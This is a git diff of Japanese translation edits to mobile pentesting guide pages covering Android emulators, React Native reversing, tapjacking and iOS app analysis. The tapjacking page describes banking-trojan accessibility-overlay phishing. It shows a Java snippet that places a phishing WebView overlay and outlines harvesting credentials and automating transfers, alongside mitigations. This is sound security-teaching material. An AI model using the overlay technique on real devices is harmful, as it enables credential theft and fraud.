+> macOSの場合、`avdmanager`ツールは`/Users//Library/Android/sdk/tools/bin/avdmanager`に、`emulator`は`/Users//Library/Android/sdk/emulator/emulator`にあります。インストールされている場合です。
+
 まず、**使用したい電話を決定する必要があります**。可能な電話のリストを見るには、次のコマンドを実行します:
 ```
 C:\Users\\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list device
@@ -93,7 +96,7 @@ OEM : Google
 [...]
 ```
 デバイスの名前を決定したら、**このデバイスで実行するAndroidイメージを決定する必要があります。**\
-`sdkmanager`を使用してすべてのオプションをリストできます:
+`sdkmanager`を使用してすべてのオプションをリストできます:
 ```bash
 C:\Users\\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat --list
 ```
@@ -101,7 +104,7 @@ C:\Users\\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat --list
 ```bash
 C:\Users\\AppData\Local\Android\Sdk\tools\bin\sdkmanager.bat "platforms;android-28" "system-images;android-28;google_apis;x86_64"
 ```
-ダウンロードしたいAndroidイメージをダウンロードしたら、次のコマンドで**ダウンロードしたすべてのAndroidイメージを一覧表示**できます:
+ダウンロードしたいAndroidイメージをダウンロードしたら、次のコマンドで**ダウンロードしたすべてのAndroidイメージをリスト**できます:
 ```
 C:\Users\\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list target
 ----------
@@ -121,8 +124,8 @@ Revision: 4
 ```bash
 C:\Users\\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat -v create avd -k "system-images;android-28;google_apis;x86_64" -n "AVD9" -d "Nexus 5X"
 ```
-最後のコマンドで、**デバイス** "_Nexus 5X_" と **Android イメージ** "_system-images;android-28;google_apis;x86_64_" を使用して、**VM 名** "_AVD9_" を作成しました。\
-今、次のコマンドで作成した **仮想マシン** のリストを表示できます:
+最後のコマンドで、**"_AVD9_"という名前のVMを作成しました**。使用した**デバイス**は"_Nexus 5X_"で、**Androidイメージ**は"_system-images;android-28;google_apis;x86_64_"です。\
+今、次のコマンドで作成した**仮想マシンの一覧を表示できます**:
 ```bash
 C:\Users\\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list avd
 
@@ -139,6 +142,9 @@ Error: Google pixel_2 no longer exists as a device
 ```
 ### 仮想マシンを実行する
 
+> [!WARNING]
+> macOSの場合、`avdmanager`ツールは`/Users//Library/Android/sdk/tools/bin/avdmanager`に、`emulator`は`/Users//Library/Android/sdk/emulator/emulator`にあります。インストールされている場合です。
+
 作成された仮想マシンをリストする方法はすでに見ましたが、**次の方法でもリストできます**:
 ```bash
 C:\Users\\AppData\Local\Android\Sdk\tools\emulator.exe -list-avds
@@ -156,7 +162,7 @@ C:\Users\\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht
 ```
 ### コマンドラインオプション
 
-ただし、**仮想マシンを起動するために使用できるさまざまなコマンドラインの便利なオプションがたくさんあります**。以下にいくつかの興味深いオプションを示しますが、[**完全なリストはここで見つけることができます**](https://developer.android.com/studio/run/emulator-commandline)
+ただし、**仮想マシンを起動するために使用できるさまざまな便利なコマンドラインオプションがたくさんあります**。以下にいくつかの興味深いオプションを示しますが、[**完全なリストはここで見つけることができます**](https://developer.android.com/studio/run/emulator-commandline)
 
 **ブート**
 
@@ -165,8 +171,10 @@ C:\Users\\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht
 
 **ネットワーク**
 
-- `-dns-server 192.0.2.0, 192.0.2.255` : VMにカンマ区切りでDNSサーバーを指定することを許可します。
-- **`-http-proxy 192.168.1.12:8080`** : 使用するHTTPプロキシを指定することを許可します(Burpを使用してトラフィックをキャプチャするのに非常に便利です)
+- `-dns-server 192.0.2.0, 192.0.2.255` : VMに対してカンマ区切りでDNSサーバーを指定できます。
+- **`-http-proxy 192.168.1.12:8080`** : 使用するHTTPプロキシを指定できます(Burpを使用してトラフィックをキャプチャするのに非常に便利です)
+- プロキシ設定が何らかの理由で機能しない場合は、内部で設定するか、「Super Proxy」や「ProxyDroid」のようなアプリケーションを使用して設定してみてください。
+- `-netdelay 200` : ミリ秒単位でネットワーク遅延エミュレーションを設定します。
 - `-port 5556` : コンソールとadbに使用されるTCPポート番号を設定します。
 - `-ports 5556,5559` : コンソールとadbに使用されるTCPポートを設定します。
 - **`-tcpdump /path/dumpfile.cap`** : すべてのトラフィックをファイルにキャプチャします
diff --git a/src/mobile-pentesting/android-app-pentesting/react-native-application.md b/src/mobile-pentesting/android-app-pentesting/react-native-application.md
index 0cced88be..3a2b36d54 100644
--- a/src/mobile-pentesting/android-app-pentesting/react-native-application.md
+++ b/src/mobile-pentesting/android-app-pentesting/react-native-application.md
@@ -83,14 +83,14 @@ strings -n 6 index.android.bundle | grep -Ei "(Sentry\.init|dsn\s*:)"
 
 ## Hermesバイトコード
 
-バンドルに**Hermesバイトコード**が含まれている場合、アプリのJavascriptコードに**アクセスできなくなります**(ミニファイ版にもアクセスできません)。
+バンドルに**Hermesバイトコード**が含まれている場合、アプリのJavascriptコードに**アクセスできなくなります**(ミニファイドバージョンにもアクセスできません)。
 
 バンドルにHermesバイトコードが含まれているかどうかは、次のコマンドを実行して確認できます:
 ```bash
 file index.android.bundle
 index.android.bundle: Hermes JavaScript bytecode, version 96
 ```
-ただし、ツール **[hbctool](https://github.com/bongtrop/hbctool)**、新しいバイトコードバージョンをサポートする hbctool の更新されたフォーク、**[hasmer](https://github.com/lucasbaizer2/hasmer)**、**[hermes_rs](https://github.com/Pilfer/hermes_rs)** (Rust ライブラリ/APIs)、または **[hermes-dec](https://github.com/P1sec/hermes-dec)** を使用して **バイトコードを逆アセンブル**し、さらに **それを擬似 JS コードにデコンパイル**することができます。例えば:
+ただし、ツール **[hbctool](https://github.com/bongtrop/hbctool)**、新しいバイトコードバージョンをサポートする hbctool の更新されたフォーク、**[hasmer](https://github.com/lucasbaizer2/hasmer)**、**[hermes_rs](https://github.com/Pilfer/hermes_rs)** (Rust ライブラリ/APIs)、または **[hermes-dec](https://github.com/P1sec/hermes-dec)** を使用して **バイトコードを逆アセンブル** し、さらに **それを擬似 JS コードにデコンパイル** することができます。例えば:
 ```bash
 # Disassemble and re-assemble with hbctool (works only for supported HBC versions)
 hbctool disasm ./index.android.bundle ./hasm_out
@@ -153,15 +153,15 @@ console.log('[-] Could not patch: ' + e);
 }
 });
 ```
-警告: 適切に構築されたリリースビルドでは、`DevSupportManagerImpl` および関連するデバッグ専用クラスは削除され、このフラグを切り替えるとアプリがクラッシュするか、効果がない場合があります。これが機能する場合、通常はデベロッパーメニューを表示し、デバッガー/インスペクターを接続できます。
+警告: 適切に構築されたリリースビルドでは、`DevSupportManagerImpl` および関連するデバッグ専用クラスが削除され、このフラグを切り替えるとアプリがクラッシュするか、効果がない場合があります。これが機能する場合、通常はデバッガーやインスペクターを接続してデベロッパーメニューを表示できます。
 
 ### RNアプリにおけるネットワークインターセプション
 
 React Native Androidは通常、内部でOkHttpに依存しています(`Networking`ネイティブモジュールを介して)。非ルートデバイスで動的テスト中にトラフィックをインターセプト/観察するには:
-- システムプロキシを使用し、ユーザーCAを信頼するか、他の一般的なAndroid TLSバイパス技術を使用します。
+- システムプロキシを使用し、ユーザーCAを信頼するか、他の一般的なAndroid TLSバイパステクニックを使用します。
 - RN特有のヒント: アプリがリリース時に誤ってFlipperをバンドルしている場合(デバッグツール)、Flipper Networkプラグインがリクエスト/レスポンスを公開できます。
 
-一般的なAndroidのインターセプションおよびピンニングバイパス技術については、以下を参照してください:
+一般的なAndroidインターセプションおよびピンニングバイパステクニックについては、以下を参照してください:
 
 {{#ref}}
 make-apk-accept-ca-certificate.md
diff --git a/src/mobile-pentesting/android-app-pentesting/tapjacking.md b/src/mobile-pentesting/android-app-pentesting/tapjacking.md
index 9227c3edf..30fc5b541 100644
--- a/src/mobile-pentesting/android-app-pentesting/tapjacking.md
+++ b/src/mobile-pentesting/android-app-pentesting/tapjacking.md
@@ -9,7 +9,7 @@
 
 ### 検出
 
-この攻撃に対して脆弱なアプリを検出するには、androidマニフェスト内の**エクスポートされたアクティビティ**を探す必要があります(インテントフィルターを持つアクティビティはデフォルトで自動的にエクスポートされることに注意してください)。エクスポートされたアクティビティを見つけたら、**それらが何らかの権限を必要とするか確認してください**。これは、**悪意のあるアプリケーションもその権限を必要とするためです**。
+この攻撃に対して脆弱なアプリを検出するには、androidマニフェスト内の**エクスポートされたアクティビティ**を検索する必要があります(インテントフィルターを持つアクティビティはデフォルトで自動的にエクスポートされることに注意してください)。エクスポートされたアクティビティを見つけたら、**それらが何らかの権限を必要とするか確認してください**。これは、**悪意のあるアプリケーションもその権限を必要とするためです**。
 
 アプリの最小SDKバージョンを確認することもできます。**`AndroidManifest.xml`**ファイル内の**`android:minSdkVersion`**の値を確認してください。値が**30未満**の場合、そのアプリはTapjackingに対して脆弱です。
 
@@ -35,11 +35,11 @@ android:layout_height="wrap_content"
 android:filterTouchesWhenObscured="true">
 
 ```
-## エクスプロイト
+## Exploitation
 
 ### Tapjacking-ExportedActivity
 
-最も**最近のAndroidアプリケーション**でTapjacking攻撃を実行するもの(+ 攻撃されたアプリケーションのエクスポートされたアクティビティの前に呼び出すこと)が見つかるのは: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity)。
+最も**最近のAndroidアプリケーション**でTapjacking攻撃を実行するもの(+ 攻撃対象アプリケーションのエクスポートされたアクティビティの前に呼び出すこと)が見つかるのは: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity)。
 
 **READMEの指示に従って使用してください**。
 
@@ -50,26 +50,26 @@ android:filterTouchesWhenObscured="true">
 ### Qark
 
 > [!CAUTION]
-> このプロジェクトは現在メンテナンスされていないようで、この機能はもはや正しく動作していないようです。
+> このプロジェクトは現在メンテナンスされていないようで、この機能は正しく動作していないようです。
 
-[**qark**](https://github.com/linkedin/qark)を`--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk`パラメータと共に使用して、可能な**Tapjacking**脆弱性をテストするための悪意のあるアプリケーションを作成できます。\
+`--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` パラメータを使用して[**qark**](https://github.com/linkedin/qark)を使用すると、可能な**Tapjacking**脆弱性をテストするための悪意のあるアプリケーションを作成できます。\
 
-緩和策は比較的簡単で、開発者は別のビューに覆われているときにタッチイベントを受け取らないことを選択できます。[Android Developer’s Reference](https://developer.android.com/reference/android/view/View#security)を使用して:
+緩和策は比較的簡単で、開発者は別のビューに覆われているときにタッチイベントを受け取らないことを選択できます。[Android Developer’s Reference](https://developer.android.com/reference/android/view/View#security)を使用すると:
 
-> 時には、アプリケーションがユーザーの完全な知識と同意のもとでアクションが実行されていることを確認することが不可欠です。たとえば、権限リクエストの承認、購入の実行、広告のクリックなどです。残念ながら、悪意のあるアプリケーションは、ビューの意図された目的を隠すことによって、ユーザーを騙してこれらのアクションを実行させようとする可能性があります。これに対する対策として、フレームワークは、敏感な機能へのアクセスを提供するビューのセキュリティを向上させるために使用できるタッチフィルタリングメカニズムを提供します。
+> 時には、アプリケーションがユーザーの完全な知識と同意のもとでアクションが実行されていることを確認することが重要です。たとえば、権限リクエストを承認したり、購入を行ったり、広告をクリックしたりする場合です。残念ながら、悪意のあるアプリケーションは、ビューの意図された目的を隠すことによって、ユーザーを騙してこれらのアクションを実行させようとする可能性があります。これに対する対策として、フレームワークは、敏感な機能へのアクセスを提供するビューのセキュリティを向上させるために使用できるタッチフィルタリングメカニズムを提供します。
 >
 > タッチフィルタリングを有効にするには、[`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29)を呼び出すか、android:filterTouchesWhenObscuredレイアウト属性をtrueに設定します。有効にすると、フレームワークは、ビューのウィンドウが別の可視ウィンドウによって覆われているときに受信したタッチを破棄します。その結果、トースト、ダイアログ、または他のウィンドウがビューのウィンドウの上に表示されるとき、ビューはタッチを受け取らなくなります。
 
 ---
 
-## アクセシビリティオーバーレイフィッシング(バンキングトロイの木馬バリアント)
+## Accessibility Overlay Phishing (Banking-Trojan Variant)
 
-クラシックなTapjackingに加えて、現代のAndroidバンキングマルウェアファミリー(例: **ToxicPanda**、BrasDex、Sovaなど)は、**Accessibility Service**を悪用して、正当なアプリケーションの上にフルスクリーンのWebView **オーバーレイ**を配置し、ユーザー入力を下のビューに**転送**できるようにします。これにより、信憑性が大幅に向上し、攻撃者は資格情報、OTPを盗んだり、不正な取引を自動化したりすることができます。
+クラシックなTapjackingに加えて、現代のAndroidバンキングマルウェアファミリー(例:**ToxicPanda**、BrasDex、Sovaなど)は、**Accessibility Service**を悪用して、正当なアプリケーションの上にフルスクリーンのWebView **オーバーレイ**を配置し、ユーザー入力を下のビューに**転送する**ことができます。これにより、信憑性が大幅に向上し、攻撃者は資格情報、OTPを盗んだり、不正な取引を自動化したりすることができます。
 
 ### 仕組み
 1. 悪意のあるAPKは、非常に敏感な`BIND_ACCESSIBILITY_SERVICE`権限を要求し、通常は偽のGoogle/Chrome/PDFビューアーダイアログの背後にリクエストを隠します。
 2. ユーザーがサービスを有効にすると、マルウェアは追加の危険な権限(`READ_SMS`、`SYSTEM_ALERT_WINDOW`、`REQUEST_INSTALL_PACKAGES`など)を付与するために必要なタップをプログラム的にシミュレートします。
-3. **WebView**が膨張され、**`TYPE_ACCESSIBILITY_OVERLAY`**ウィンドウタイプを使用してウィンドウマネージャーに追加されます。オーバーレイは完全に不透明または半透明にレンダリングでき、元のタッチがバックグラウンドアクティビティに配信されるように*「透過的」*としてフラグを立てることができます(したがって、取引は実際に行われ、犠牲者はフィッシングフォームのみを見ることになります)。
+3. **WebView**が膨張され、**`TYPE_ACCESSIBILITY_OVERLAY`**ウィンドウタイプを使用してウィンドウマネージャーに追加されます。オーバーレイは完全に不透明または半透明にレンダリングされ、元のタッチがバックグラウンドアクティビティに配信されるように*「透過的」*としてフラグを立てることができます(したがって、取引は実際に行われ、犠牲者はフィッシングフォームのみを見ることになります)。
 ```java
 WebView phishingView = new WebView(getApplicationContext());
 phishingView.getSettings().setJavaScriptEnabled(true);
@@ -86,21 +86,21 @@ PixelFormat.TRANSLUCENT);
 wm.addView(phishingView, lp);
 ```
 ### 銀行トロイの典型的なワークフロー
-* インストールされたパッケージをクエリする (`QUERY_ALL_PACKAGES`) ことで、現在開いている銀行/ウォレットアプリを特定します。
-* 特定のアプリケーション(ロゴ、色、i18n文字列など)を完璧に模倣した**HTML/JSオーバーレイテンプレート**をC2からダウンロードします。
-* オーバーレイを表示し、認証情報/PIN/パターンを収集します。
-* **Accessibility API** (`performGlobalAction`, `GestureDescription`) を使用して、バックグラウンドでの送金を自動化します。
+* インストールされたパッケージをクエリする (`QUERY_ALL_PACKAGES`) ことで、現在開いている銀行/ウォレットアプリを特定する。
+* 特定のアプリケーション(ロゴ、色、i18n文字列など)を完璧に模倣した**HTML/JSオーバーレイテンプレート**をC2からダウンロードする。
+* オーバーレイを表示し、認証情報/PIN/パターンを収集する。
+* **Accessibility API** (`performGlobalAction`, `GestureDescription`) を使用して、バックグラウンドでの送金を自動化する。
 
 ### 検出と緩和
-* `adb shell pm list packages -3 -e BIND_ACCESSIBILITY_SERVICE`を使用してインストールされたアプリのリストを監査します。
+* `adb shell pm list packages -3 -e BIND_ACCESSIBILITY_SERVICE`を使用してインストールされたアプリのリストを監査する。
 * アプリケーション側(銀行/ウォレット)から:
-- 敏感なビューに対して**`android:accessibilityDataSensitive="accessibilityDataPrivateYes"`**(Android 14+)を有効にして、非Playストアサービスをブロックします。
-- `setFilterTouchesWhenObscured(true)`と`FLAG_SECURE`を組み合わせます。
+- 敏感なビューに対して**`android:accessibilityDataSensitive="accessibilityDataPrivateYes"`**(Android 14+)を有効にして、非Playストアサービスをブロックする。
+- `setFilterTouchesWhenObscured(true)`と`FLAG_SECURE`を組み合わせる。
 * システムの強化:
-- *不明なソースからのインストール*と*信頼できないアプリのアクセシビリティ*を無効にします。
-- PlayProtectと最新のデバイスを強制します。
+- *不明なソースからのインストール*と*信頼できないアプリのアクセシビリティ*を無効にする。
+- PlayProtectと最新のデバイスを強制する。
 
-フルリモートデバイス制御のためのAccessibility Servicesの活用に関する詳細は、以下を参照してください:
+フルリモートデバイス制御のためのアクセシビリティサービスの活用に関する詳細は、以下を参照してください:
 
 {{#ref}}
 accessibility-services-abuse.md
diff --git a/src/mobile-pentesting/ios-pentesting/README.md b/src/mobile-pentesting/ios-pentesting/README.md
index 3b9ad2c55..e609ef38d 100644
--- a/src/mobile-pentesting/ios-pentesting/README.md
+++ b/src/mobile-pentesting/ios-pentesting/README.md
@@ -2,44 +2,44 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## iOS Basics
+## iOSの基本
 
 {{#ref}}
 ios-basics.md
 {{#endref}}
 
-## Testing Environment
+## テスト環境
 
-このページでは、**iOSシミュレーター**、**エミュレーター**、および**脱獄**に関する情報を見つけることができます:
+このページでは、**iOSシミュレーター**、**エミュレーター**、および**脱獄**に関する情報を見つけることができます:
 
 {{#ref}}
 ios-testing-environment.md
 {{#endref}}
 
-## Initial Analysis
+## 初期分析
 
-### Basic iOS Testing Operations
+### 基本的なiOSテスト操作
 
-テスト中に**いくつかの操作が提案されます**(デバイスに接続、ファイルの読み書き/アップロード/ダウンロード、いくつかのツールを使用するなど)。したがって、これらのアクションのいずれかを実行する方法がわからない場合は、**ページを読み始めてください**:
+テスト中に**いくつかの操作が提案されます**(デバイスに接続、ファイルの読み書き/アップロード/ダウンロード、いくつかのツールを使用するなど)。したがって、これらの操作のいずれかを実行する方法がわからない場合は、**ページを読み始めてください**:
 
 {{#ref}}
 basic-ios-testing-operations.md
 {{#endref}}
 
 > [!TIP]
-> 次のステップのために、**アプリがデバイスにインストールされている必要があります**、そしてアプリケーションの**IPAファイル**をすでに取得している必要があります。\
+> 次のステップのために、**アプリがデバイスにインストールされている必要があります**。すでにアプリケーションの**IPAファイル**を取得している必要があります。\
 > これを行う方法を学ぶには、[Basic iOS Testing Operations](basic-ios-testing-operations.md)ページをお読みください。
 
-### Basic Static Analysis
+### 基本的な静的分析
 
-興味深いiOS - IPAファイルのデコンパイラ:
+興味深いiOS - IPAファイルのデコンパイラ:
 
 - [https://github.com/LaurieWired/Malimite](https://github.com/LaurieWired/Malimite)
 - [https://ghidra-sre.org/](https://ghidra-sre.org/)
 
 IPAファイルに対して自動静的分析を実行するために、ツール[**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF)を使用することをお勧めします。
 
-**バイナリに存在する保護の特定**:
+**バイナリに存在する保護の識別**:
 
 - **PIE (Position Independent Executable)**: 有効にすると、アプリケーションは起動するたびにランダムなメモリアドレスにロードされ、初期メモリアドレスを予測することが難しくなります。
 
@@ -47,10 +47,10 @@ IPAファイルに対して自動静的分析を実行するために、ツー
 otool -hv  | grep PIE   # PIEフラグが含まれている必要があります
 ```
 
-- **Stack Canaries**: スタックの整合性を検証するために、関数を呼び出す前にスタックに「カナリア」値が置かれ、関数が終了した後に再度検証されます。
+- **スタックカナリア**: スタックの整合性を検証するために、関数を呼び出す前にスタックに「カナリア」値が置かれ、関数が終了した後に再度検証されます。
 
 ```bash
-otool -I -v  | grep stack_chk   # stack_chk_guardおよびstack_chk_failシンボルが含まれている必要があります
+otool -I -v  | grep stack_chk   # シンボル: stack_chk_guardとstack_chk_failが含まれている必要があります
 ```
 
 - **ARC (Automatic Reference Counting)**: 一般的なメモリ破損の欠陥を防ぐため
@@ -59,13 +59,13 @@ otool -I -v  | grep stack_chk   # stack_chk_guardおよびstack_chk_
 otool -I -v  | grep objc_release   # _objc_releaseシンボルが含まれている必要があります
 ```
 
-- **Encrypted Binary**: バイナリは暗号化されている必要があります
+- **暗号化されたバイナリ**: バイナリは暗号化されている必要があります
 
 ```bash
 otool -arch all -Vl  | grep -A5 LC_ENCRYPT   # cryptidは1である必要があります
 ```
 
-**敏感/不安全な関数の特定**
+**敏感/不安全な関数の識別**
 
 - **弱いハッシュアルゴリズム**
 
@@ -133,13 +133,13 @@ grep -iER "_printf"
 grep -iER "_vsprintf"
 ```
 
-### Basic Dynamic Analysis
+### 基本的な動的分析
 
 [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF)が実行する動的分析を確認してください。さまざまなビューをナビゲートし、それらと対話する必要がありますが、他のことを行う際にいくつかのクラスをフックし、完了するとレポートを準備します。
 
-### Listing Installed Apps
+### インストールされたアプリのリスト
 
-インストールされたアプリの**バンドル識別子**を特定するには、コマンド`frida-ps -Uai`を使用します:
+`frida-ps -Uai`コマンドを使用して、インストールされたアプリの**バンドル識別子**を特定します:
 ```bash
 $ frida-ps -Uai
 PID  Name                 Identifier
@@ -171,10 +171,10 @@ ios-hooking-with-objection.md
 - **`PlugIns/`**: これは、アプリケーションの拡張機能である`.appex`ファイルを含む場合がありますが、常に存在するわけではありません。 \* [**`Core Data`**](https://developer.apple.com/documentation/coredata): アプリケーションの永続データをオフラインで保存し、一時データをキャッシュし、単一デバイス上でアプリに元に戻す機能を追加するために使用されます。単一のiCloudアカウント内で複数のデバイス間でデータを同期するために、Core Dataは自動的にスキーマをCloudKitコンテナにミラーリングします。
 - [**`PkgInfo`**](https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPRuntimeConfig/Articles/ConfigApplications.html): `PkgInfo`ファイルは、アプリケーションまたはバンドルのタイプとクリエイターコードを指定するための代替手段です。
 - **en.lproj, fr.proj, Base.lproj**: 特定の言語のリソースを含む言語パックであり、言語がサポートされていない場合のデフォルトリソースも含まれています。
-- **セキュリティ**: `_CodeSignature/`ディレクトリは、デジタル署名を通じてバンドル内のすべてのファイルの整合性を検証することにより、アプリのセキュリティに重要な役割を果たします。
+- **セキュリティ**: `_CodeSignature/`ディレクトリは、デジタル署名を通じてすべてのバンドルファイルの整合性を検証することにより、アプリのセキュリティに重要な役割を果たします。
 - **アセット管理**: `Assets.car`ファイルは圧縮を使用してグラフィカルアセットを効率的に管理し、アプリケーションのパフォーマンスを最適化し、全体のサイズを削減するために重要です。
 - **FrameworksとPlugIns**: これらのディレクトリはiOSアプリケーションのモジュール性を強調し、開発者が再利用可能なコードライブラリ(`Frameworks/`)を含めたり、アプリの機能を拡張したりすることを可能にします。
-- **ローカリゼーション**: この構造は複数の言語をサポートし、特定の言語パックのリソースを含むことで、グローバルなアプリケーションの展開を促進します。
+- **ローカリゼーション**: この構造は複数の言語をサポートし、特定の言語パックのリソースを含むことでグローバルなアプリケーションのリーチを促進します。
 
 **Info.plist**
 
@@ -186,12 +186,12 @@ ios-hooking-with-objection.md
 ```bash
 $ plutil -convert xml1 Info.plist
 ```
-- **Linux用**:
+- **Linuxの場合**:
 ```bash
 $ apt install libplist-utils
 $ plistutil -i Info.plist -o Info_xml.plist
 ```
-**Info.plist** ファイルが明らかにできる膨大な情報の中で、注目すべきエントリにはアプリの権限文字列 (`UsageDescription`)、カスタムURLスキーム (`CFBundleURLTypes`)、およびアプリトランスポートセキュリティの設定 (`NSAppTransportSecurity`) が含まれます。これらのエントリは、エクスポート/インポートされたカスタムドキュメントタイプ (`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`) のような他のエントリとともに、ファイルを検査するか、単純な `grep` コマンドを使用することで簡単に見つけることができます。
+**Info.plist**ファイルが明らかにできる膨大な情報の中で、注目すべき項目にはアプリの権限文字列(`UsageDescription`)、カスタムURLスキーム(`CFBundleURLTypes`)、およびApp Transport Securityの設定(`NSAppTransportSecurity`)が含まれます。これらの項目は、エクスポート/インポートされたカスタムドキュメントタイプ(`UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`)などとともに、ファイルを検査するか、単純な`grep`コマンドを使用することで簡単に見つけることができます:
 ```bash
 $ grep -i  Info.plist
 ```
@@ -202,7 +202,7 @@ iOS環境では、ディレクトリは**システムアプリケーション**
 > [!WARNING]
 > iOSのアプリケーションはサンドボックス化される必要があるため、各アプリには**`$HOME/Library/Containers`**内にアプリの**`CFBundleIdentifier`**をフォルダ名とするフォルダも存在します。
 >
-> ただし、両方のフォルダ(データフォルダとコンテナフォルダ)には、`MCMetadataIdentifier`キーで両方のファイルをリンクする**`.com.apple.mobile_container_manager.metadata.plist`**ファイルがあります。
+> ただし、両方のフォルダ(データフォルダとコンテナフォルダ)には、両方のファイルを`MCMetadataIdentifier`キーでリンクするファイル**`.com.apple.mobile_container_manager.metadata.plist`**があります。
 
 ユーザーインストールアプリのインストールディレクトリを発見するために、**objection tool**は便利なコマンド`env`を提供します。このコマンドは、対象のアプリに関する詳細なディレクトリ情報を表示します。以下は、このコマンドの使用例です:
 ```bash
@@ -215,11 +215,11 @@ CachesDirectory    /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8E
 DocumentDirectory  /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents
 LibraryDirectory   /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library
 ```
-アプリ名は、`find` コマンドを使用して `/private/var/containers` 内で検索することもできます:
+代わりに、アプリ名は `/private/var/containers` 内で `find` コマンドを使用して検索できます:
 ```bash
 find /private/var/containers -name "Progname*"
 ```
-`ps`や`lsof`のようなコマンドは、アプリのプロセスを特定し、それぞれオープンファイルをリストするためにも利用でき、アプリケーションのアクティブなディレクトリパスに関する洞察を提供します:
+`ps`や`lsof`のようなコマンドは、アプリのプロセスを特定し、それぞれオープンファイルをリストするために利用でき、アプリケーションのアクティブなディレクトリパスに関する洞察を提供します:
 ```bash
 ps -ef | grep -i 
 lsof -p  | grep -i "/containers" | head -n 1
@@ -227,7 +227,7 @@ lsof -p  | grep -i "/containers" | head -n 1
 **バンドルディレクトリ:**
 
 - **AppName.app**
-- これはIPAで以前に見たアプリケーションバンドルで、重要なアプリケーションデータ、静的コンテンツ、およびアプリケーションのコンパイル済みバイナリを含みます。
+- これはIPAで以前に見たアプリケーションバンドルで、アプリケーションの重要なデータ、静的コンテンツ、およびアプリケーションのコンパイル済みバイナリを含んでいます。
 - このディレクトリはユーザーに見えますが、**ユーザーは書き込むことができません**。
 - このディレクトリの内容は**バックアップされません**。
 - このフォルダの内容は**コード署名を検証するため**に使用されます。
@@ -240,7 +240,7 @@ lsof -p  | grep -i "/containers" | head -n 1
 - このディレクトリの内容は**バックアップされます**。
 - アプリは`NSURLIsExcludedFromBackupKey`を設定することでパスを無効にできます。
 - **Library/**
-- **キャッシュ**、**設定**、**クッキー**、およびプロパティリスト(plist)設定ファイルなど、**ユーザー固有でない**すべての**ファイル**を含みます。
+- **キャッシュ**、**設定**、**クッキー**、およびプロパティリスト(plist)設定ファイルなど、**ユーザー固有でないすべてのファイル**を含みます。
 - iOSアプリは通常`Application Support`および`Caches`サブディレクトリを使用しますが、アプリはカスタムサブディレクトリを作成できます。
 - **Library/Caches/**
 - **半永続的なキャッシュファイル**を含みます。
@@ -279,7 +279,7 @@ Regular           420  None                ...  README.txt
 ```
 ### バイナリリバース
 
-`.app` フォルダー内には `` というバイナリファイルがあります。これは **実行される** ファイルです。ツール **`otool`** を使用してバイナリの基本的な検査を行うことができます:
+`.app` フォルダー内には `` というバイナリファイルがあります。これが **実行される** ファイルです。ツール **`otool`** を使用してバイナリの基本的な検査を行うことができます:
 ```bash
 otool -Vh DVIA-v2 #Check some compilation attributes
 magic  cputype cpusubtype  caps    filetype ncmds sizeofcmds      flags
@@ -375,19 +375,19 @@ ios-basics.md
 
 plistファイルにデータを永続化する最も一般的な方法は、**NSUserDefaults**を使用することです。このplistファイルは、**`Library/Preferences/.plist`**のアプリサンドボックス内に保存されます。
 
-[`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults)クラスは、デフォルトシステムと対話するためのプログラムインターフェースを提供します。デフォルトシステムは、アプリケーションが**ユーザーの好みに応じて**動作をカスタマイズできるようにします。`NSUserDefaults`によって保存されたデータは、アプリケーションバンドル内で表示できます。このクラスは**plist** **ファイル**に**データ**を保存しますが、少量のデータで使用することを意図しています。
+[`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults)クラスは、デフォルトシステムと対話するためのプログラムインターフェースを提供します。デフォルトシステムは、アプリケーションが**ユーザーの好みに応じて**動作をカスタマイズできるようにします。`NSUserDefaults`によって保存されたデータは、アプリケーションバンドル内で表示できます。このクラスは、**plist** **ファイル**に**データ**を保存しますが、少量のデータで使用することを意図しています。
 
 このデータは、信頼できるコンピュータを介して直接アクセスすることはできませんが、**バックアップ**を行うことでアクセスできます。
 
 **`NSUserDefaults`**を使用して保存された情報を**ダンプ**するには、objectionの`ios nsuserdefaults get`を使用します。
 
-アプリケーションによって使用されるすべてのplistを見つけるには、`/private/var/mobile/Containers/Data/Application/{APPID}`にアクセスし、次のコマンドを実行します:
+アプリケーションで使用されているすべてのplistを見つけるには、`/private/var/mobile/Containers/Data/Application/{APPID}`にアクセスし、次のコマンドを実行します:
 ```bash
 find ./ -name "*.plist"
 ```
-ファイルを**XMLまたはバイナリ(bplist)**形式からXMLに変換するために、オペレーティングシステムに応じたさまざまな方法が利用可能です:
+ファイルを**XMLまたはバイナリ(bplist)**形式からXMLに変換するために、オペレーティングシステムに応じたさまざまな方法が利用可能です。
 
-**macOSユーザー向け:** `plutil`コマンドを利用します。これはmacOS(10.2以上)に組み込まれているツールで、この目的のために設計されています:
+**macOSユーザー向け:** `plutil`コマンドを利用します。これはmacOS(10.2以上)に組み込まれているツールで、この目的のために設計されています:
 ```bash
 $ plutil -convert xml1 Info.plist
 ```
@@ -402,12 +402,12 @@ ios plist cat /private/var/mobile/Containers/Data/Application/
 ```
 ### Core Data
 
